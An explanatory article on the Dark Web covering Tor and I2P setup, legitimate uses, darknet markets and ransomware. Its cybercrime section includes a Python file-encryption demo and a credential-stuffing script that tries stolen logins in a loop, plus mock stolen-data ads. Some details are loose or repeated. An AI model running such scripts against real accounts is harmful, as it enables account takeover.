The Dark Web: myths and realities 

Table of contents

• The Dark Web: myths and realities 
• What is the Dark Web? 
• How does the Dark Web work? 
• Legitimate uses of the Dark Web 
• The Dark Web and cybercrime 
• How to access the Dark Web safely
• Dark Web vs. Deep Web: understanding the difference 
• Law enforcement and the fight against Dark Web crime 
• The future of the Dark Web 

---

The Dark Web: myths and realities 

The Dark Web is one of the most misunderstood areas of the internet. Often associated with criminal activity, hacking, and illicit markets, it has also become a space for privacy advocates, journalists, and whistleblowers seeking anonymity. But what really happens in these hidden corners of the web? Is it as dangerous as people think? 

This article explores the Dark Web, separating facts from myths, examining its legitimate and illegal uses, and shedding light on the tools that allow access to this secretive part of the internet. 

What is the Dark Web?

The Dark Web refers to a part of the Deep Web that is intentionally hidden and requires special software to access.

Unlike the Surface Web, which includes indexed sites found via search engines like Google, the Deep Web consists of unindexed content such as private databases, academic journals, and intranet systems.

The Dark Web is a small section of the Deep Web, but it is unique because it requires anonymizing tools like Tor (The Onion Router) or I2P (Invisible Internet Project) to navigate. 

How does the Dark Web work? 

The Dark Web relies on encryption technologies and anonymous routing to protect the privacy of users and websites. Unlike the Surface Web, which operates using standard protocols like HTTP/HTTPS, the Dark Web functions on specialized networks such as Tor (The Onion Router) and I2P (Invisible Internet Project). 

These networks use anonymous domain addresses (such as .onion for Tor and .i2p for I2P) and route traffic through multiple encrypted nodes, making it extremely difficult to trace the origin of a connection. 

Tor: the onion routing system 

The Tor network is the most widely used method to access the Dark Web. It is based on a multi-layered encryption system, similar to an onion’s structure.

When a user sends a request to a .onion website, the traffic is routed through several Tor nodes (relays) before reaching the destination. 

Here are the three main types of Tor nodes: 

• Entry Node (Guard Node)
  Receives the initial connection and encrypts it, hiding the user’s real IP. 

• Middle Node
  Transfers traffic between different nodes without knowing the original source or final destination. 

• Exit Node
  Decrypts the message and forwards it to the target website while keeping the user anonymous. 

Each node only knows the previous and next node in the chain, ensuring that no single entity can trace the entire connection. 

Example: configuring Tor on Linux 

To connect to the Tor network using a Linux terminal, you can install and start Tor with: 

bash 

sudo apt update && sudo apt install tor -y 

sudo systemctl start tor 

To verify if the Tor connection is active, you can use cURL with the Tor proxy: 

bash 

curl --socks5-hostname 127.0.0.1:9050 https://check.torproject.org/

If the connection is successful, the site will confirm that you are browsing via Tor. 

Example of a .onion address 

Websites on the Dark Web use .onion domains, which cannot be accessed with regular browsers like Chrome or Firefox unless they are configured to use Tor. 

Here is an example of a .onion domain: 

http://duskgytldkxiuqc6.onion/ 

This was (or still is) the Tor version of DuckDuckGo, a privacy-focused search engine. 

I2P: the alternative Dark Web network 

I2P (Invisible Internet Project) is another anonymous network, optimized for peer-to-peer communication rather than web browsing. Unlike Tor, which is mainly used to access hidden websites, I2P is designed for secure messaging, file sharing, and decentralized applications. 

Sites within I2P do not use .onion domains but instead have .i2p addresses, and traffic is routed through bidirectional encrypted tunnels, making tracking even more difficult. 

Example: setting up I2P on Linux 

To install and start I2P on Linux, you can use the following commands: 

bash 

sudo apt update && sudo apt install i2p -y 

i2prouter start 

Once installed, the I2P router can be accessed via the local interface at: 

cpp 

http://127.0.0.1:7657

How Dark Web traffic is routed 

Traffic on the Dark Web does not follow a direct path between the user and the server. Instead, it is routed through multiple anonymous nodes to obscure both the sender and the receiver. 

To visualize how a Tor connection works, consider the following scenario: 

• Alice wants to visit a .onion site. 

• Her traffic is sent through Node A (Entry) → Node B (Middle) → Node C (Exit). 

• The website receives the request and responds via the same path in reverse. 

At no point does the .onion site know Alice’s real IP address, and Alice has no knowledge of the server’s true location. 

Example: viewing a Tor circuit in Python 

For those interested in tracking Tor circuits, here’s a simple Python script using the stem library to interact with the Tor network: 

python 

from stem.control import Controller 

with Controller.from_port(port=9051) as controller: 

    controller.authenticate(password='mypass')  # Replace with your Tor password 

    circuit = controller.get_circuits() 

    for c in circuit: 

        print("Circuit ID:", c.id) 

        for r in c.path: 

            print(" -> Node:", r)

This script prints the Tor nodes through which traffic is routed in real-time. 

Legitimate uses of the Dark Web 

Despite its notorious reputation, the Dark Web is not solely a hub for criminal activity. Instead, it serves as a valuable tool for privacy, cyber security, and freedom of expression, especially in countries with government censorship and mass surveillance. 

Here are some of the most important legitimate uses of the Dark Web, along with real-world examples of platforms and tools designed for privacy and security. 

Secure communication for journalists and whistleblowers 

One of the most critical uses of the Dark Web is protecting journalistic sources and whistleblowers, who expose corruption, human rights violations, and illegal activities within governments or corporations. 

SecureDrop: the anonymous tip system 

SecureDrop is a secure communication platform accessible only via Tor. Developed by the Freedom of the Press Foundation, it is used by major media organizations, including: 

• The Guardian;

• The New York Times;

• The Washington Post.

Using SecureDrop, whistleblowers can submit confidential documents and tips anonymously without fear of being traced. 

Example of a SecureDrop access via Tor: 

http://secrdrop5wyphb5x.onion/ 

Real case: Edward Snowden and the Dark Web 

In 2013, Edward Snowden, a former NSA analyst, used anonymity tools similar to SecureDrop to send classified documents to journalists from The Guardian and The Washington Post. These documents revealed the PRISM mass surveillance program. 

Without technologies like Tor and the Dark Web, it would have been nearly impossible for Snowden to leak these documents while remaining anonymous. 

Access to uncensored information 

In many countries with authoritarian governments, Internet access is heavily monitored and restricted. Independent news platforms, social media, and even Wikipedia are often blocked by governments. 

The Dark Web provides a way for people to access uncensored news and information through special Tor mirrors of major websites. 

BBC Tor mirror: free news for everyone 

To ensure access to free news in censored regions such as China, Iran, and Russia, BBC has launched a .onion versionof its website, accessible only through Tor. 

BBC Tor mirror: 

http://bbcnewsv2vjtpsuy.onion/ 

Other archival and documentation projects, like The Internet Archive, also have Tor mirrors to prevent censorship. 

Privacy and secure browsing 

Many people use the Dark Web to protect their online privacy and prevent their data from being tracked by corporations and governments. 

• Facebook on Tor: a private social network 
  Even Facebook acknowledges the need for privacy and has launched a .onion version of its platform. This allows users in heavily restricted countries to access Facebook anonymously, bypassing local censorship. 

Facebook on Tor: 

https://www.facebookcorewwwi.onion

Using Facebook via Tor ensures that governments and ISPs cannot track user activity. 

DuckDuckGo: the privacy-focused search engine 

DuckDuckGo, a search engine known for its privacy-first approach, has a .onion version that allows users to browse the web without being tracked by Google or other mainstream search engines. 

DuckDuckGo on Tor: 

cpp 

http://3g2upl4pq6kufc4m.onion/

Cyber security and ethical hacking communities 

The Dark Web hosts various forums and communities dedicated to cyber security, cryptography, and ethical hacking. 

These forums are used by security experts to share knowledge about vulnerabilities, privacy techniques, and defense against cyber threats. 

Examples of ethical hacking forums on Tor 

• Dread
  A privacy-focused alternative to Reddit with discussions on cyber security and anonymity. 

• The Hub
  A forum dedicated to ethical hackers and infosec professionals. 

Note: Some forums mix ethical discussions with illegal topics, so users must differentiate between white-hat hacking and cybercrime. 

Secure cryptocurrency transactions 

While Bitcoin is partially traceable, Monero (XMR) is designed for maximum anonymity in transactions. It is often used for:

• Anonymous donations to human rights organizations;

• Purchasing legal goods from privacy-focused marketplaces;

• Paying for VPN services or other digital privacy tools. 

Monero: the privacy coin 

While Bitcoin is partially traceable, Monero (XMR) is designed for complete anonymity. It is commonly used for: 

• Supporting activists and journalists in authoritarian countries;

• Funding open-source privacy projects;

• Making secure transactions without revealing personal identities. 

Example of a monero transaction via CLI 

bash 

monero-wallet-cli --daemon-host node.moneroworld.com 

transfer 1 ADDRESS_AMOUNT XMR

The Dark Web and cybercrime 

Alongside its legitimate uses, the Dark Web is also a hub for criminal activities, including illegal marketplaces, hacking services, and identity theft.

The anonymity provided by networks like Tor and I2P makes it difficult for law enforcement to track down cybercriminals operating in these hidden spaces. 

In this section, we will explore the most common cybercrimes on the Dark Web, providing real-world examples, case studies, and even code snippets to illustrate how cybercriminals operate. 

Illegal marketplaces on the Dark Web 

Silk road: the first darknet drug market 

One of the first and most infamous illegal marketplaces on the Dark Web was Silk Road, launched in 2011 by Ross Ulbricht (also known as Dread Pirate Roberts).

This platform allowed users to buy and sell drugs, weapons, fake documents, and hacking services using Bitcoin for anonymous transactions. 

In 2013, the FBI shut down Silk Road and arrested Ulbricht, sentencing him to life in prison. However, new markets quickly emerged: 

• AlphaBay (2014-2017)
  Replaced Silk Road but was taken down by the FBI after the arrest of its founder Alexandre Cazes. 

• Hansa Market (2015-2017)
  Shut down by Dutch police after months of covert investigation. 

• Empire Market (2018-2020)
  Disappeared in an exit scam, where administrators stole users’ funds before shutting down. 

Example of a darknet market listing 

On a Dark Web forum, an advertisement for stolen data might look like this: 

NEW DUMP: 500K Credit Cards - Fresh from 2024 Breach   

Visa, Mastercard, Amex   

USA, EU, Asia   

Fullz (Name, DOB, SSN, Address)   

Price: 0.02 BTC per card   

Contact: encrypted_chat@onionmail.com

Note: Cybercriminals often use encrypted messaging apps and cryptocurrency payments to avoid being tracked. 

Ransomware-as-a-Service (RaaS) 

A major criminal business on the Dark Web is Ransomware-as-a-Service (RaaS), which allows non-technical criminals to launch ransomware attacks by purchasing pre-built malware. 

Notorious ransomware groups 

• REvil (Sodinokibi)
  Responsible for high-profile attacks, including JBS Foods and Kaseya. 

• LockBit
  A ransomware group active since 2019, offering customizable ransomware kits for affiliates. 

• Conti
  Specializes in double extortion, where stolen data is leaked if the ransom is not paid. 

Example of a RaaS advertisement on the Dark Web 

Cybercriminal groups sell ransomware kits on underground forums like this: 

LOCKBIT 3.0 RaaS - Start Making Money Today! 

Undetectable payloads   

Works on Windows & Linux   

Affiliate program - Earn 70% profit!   

Join our private Telegram group for details

Note: Many ransomware groups communicate through private Telegram and Tox chat groups to recruit new members. 

How does a ransomware attack work? 

A typical ransomware attack follows these steps: 

• Infection
  The ransomware is distributed via phishing emails, exploit kits, or compromised RDP servers. 

• File encryption
  The malware encrypts all files using advanced encryption algorithms like AES-256. 

• Ransom demand
  The victim receives a ransom note demanding payment in Bitcoin or Monero for the decryption key. 

Example: simulating file encryption in Python 

python 

from cryptography.fernet import Fernet 

# Generate an encryption key 

key = Fernet.generate_key() 

cipher = Fernet(key) 

# Encrypt a sample file 

file_path = "important_document.txt" 

with open(file_path, "rb") as file: 

    encrypted_data = cipher.encrypt(file.read()) 

# Save the encrypted file 

with open(file_path + ".enc", "wb") as file: 

    file.write(encrypted_data) 

print(f"File {file_path} successfully encrypted!") 

print(f"Decryption Key: {key.decode()}")  # In real ransomware, the key is only stored by the attacker

This script is for educational purposes only! Using ransomware for criminal activity is illegal. 

Identity theft and stolen data markets 

Each year, billions of personal records are stolen in data breaches and sold on Dark Web forums. 

Real-world data breaches 

• Cambridge Analytica (2018)
  Over 87 million Facebook profiles compromised. 

• Marriott (2018-2019
  Hackers stole data from 500 million customers, including passport numbers and credit cards. 

• T-Mobile (2021)
  Cybercriminals sold 40 million customer records on the Dark Web. 

Example of a stolen database for sale on a darknet forum 

NEW LEAK: T-Mobile Customer Data 2023 

40M Records   

Name, SSN, DOB, Address, Phone, Email   

Encrypted Credit Card Details   

Price: 0.1 BTC   

Contact: darknet_seller@protonmail.onion

Note: Cybercriminals often offer monthly subscriptions to access the latest stolen databases. 

How are passwords stolen? 

One common method for stealing passwords is credential stuffing, where hackers use databases of previously leaked passwords to gain access to other accounts. 

Example: credential stuffing attack using Python 

python 

import requests 

# List of stolen email and password combinations 

credentials = [("user1@example.com", "password123"), ("victim@example.com", "123456")] 

# Automated login attempts 

for email, password in credentials: 

    response = requests.post("https://example.com/login", data={"email": email, "password": password}) 

    if "Welcome" in response.text: 

        print(f" Successful login for {email} with password {password}") 

    else: 

        print(f" Failed attempt for {email}")

Using scripts to hack into accounts is illegal. This code is for educational purposes only. 

How to access the Dark Web safely 

For those curious about exploring the Dark Web, it’s essential to take security precautions. The most common way to access it is through the Tor Browser, which anonymizes user traffic.

However, even with Tor, risks remain. Malicious links, phishing scams, and law enforcement monitoring make it a potentially dangerous space. 

To enhance security, users should: 

• Use a VPN (Virtual Private Network) alongside Tor for additional anonymity;

• Avoid clicking on unknown .onion links;

• Never share personal information;

• Keep software updated to prevent exploits and vulnerabilities. 

Despite these precautions, venturing into the Dark Web without proper knowledge can expose users to cyber threats. 

Dark Web vs. Deep Web: understanding the difference 

Many confuse the Dark Web with the Deep Web, but they are distinct concepts.

The Deep Web encompasses all content not indexed by standard search engines, including medical records, financial statements, and private databases. The Dark Web, on the other hand, is intentionally hidden and accessible only through specific tools like Tor. 

Example
Checking your email inbox, logging into a bank account, or accessing a company’s internal networkhappens on the Deep Web. These are not illicit activities but merely private parts of the internet. The Dark Webrepresents a small, encrypted portion where anonymity is the primary focus. 

Law enforcement and the fight against Dark Web crime 

Authorities worldwide continuously monitor and disrupt Dark Web criminal activities. Agencies like the FBI, Europol, and Interpol conduct operations to shut down illegal marketplaces, seize assets, and arrest key figures behind cybercriminal networks. 

Example
Operation Onymous led to the seizure of multiple illicit websites, while the takedown of AlphaBay in 2017 was a significant victory against Dark Web crime. However, criminals often relocate their activities to new platforms, making law enforcement efforts an ongoing challenge. 

Governments are also cracking down on cryptocurrency transactions linked to illicit activity. While Bitcoin was once the preferred currency on Darknet markets, privacy-focused cryptocurrencies like Monero are gaining popularity due to their enhanced anonymity. 

The future of the Dark Web 

As cyber security measures evolve, so does the Dark Web. Governments and organizations continue to strengthen anti-cybercrime laws, while privacy advocates push for tools that protect online freedoms. The balance between security and anonymity will shape the future of the Dark Web, making it a constantly shifting landscape. 

For ethical hackers, journalists, and cyber security professionals, understanding the Dark Web is crucial. Whether used for privacy or criminal activity, it remains a powerful—yet controversial—part of the internet. 

---

Questions and answers

1. Is accessing the Dark Web illegal? 
   No, using the Dark Web is not illegal in most countries. However, engaging in criminal activities on it is against the law. 
2. Can I be tracked while using the Dark Web? 
   Although Tor provides anonymity, law enforcement agencies have methods to track users, especially if they make mistakes like revealing personal information. 
3. What’s the difference between the Dark Web and Deep Web? 
   The Deep Web consists of unindexed, private content, while the Dark Web is a small, encrypted portion requiring special tools to access. 
4. Is it safe to buy products from the Dark Web? 
   No. Many Darknet markets are scams, and law enforcement regularly seizes illicit marketplaces, leading to arrests and lost funds. 
5. How do journalists use the Dark Web? 
   Journalists use platforms like SecureDrop to communicate securely with whistleblowers and sources in authoritarian regions. 
6. Can I access social media on the Dark Web? 
   Yes, there are Tor versions of some social media sites, including Facebook’s .onion site, designed for privacy-focused users. 
7. What are the risks of using Tor? 
   Risks include malware, phishing scams, and monitoring by law enforcement if engaging in illegal activities. 
8. How do criminals use cryptocurrencies on the Dark Web? 
   Cybercriminals use Bitcoin, Monero, and other privacy coins for anonymous transactions, often for illegal goods and services. 
9. Has law enforcement successfully shut down Dark Web markets? 
   Yes, markets like Silk Road, AlphaBay, and Hansa Market have been shut down, but new ones often replace them. 
10. Is the Dark Web getting bigger? 
    Yes, with increasing concerns over online privacy and censorship, more users explore Dark Web tools for secure communication and data protection.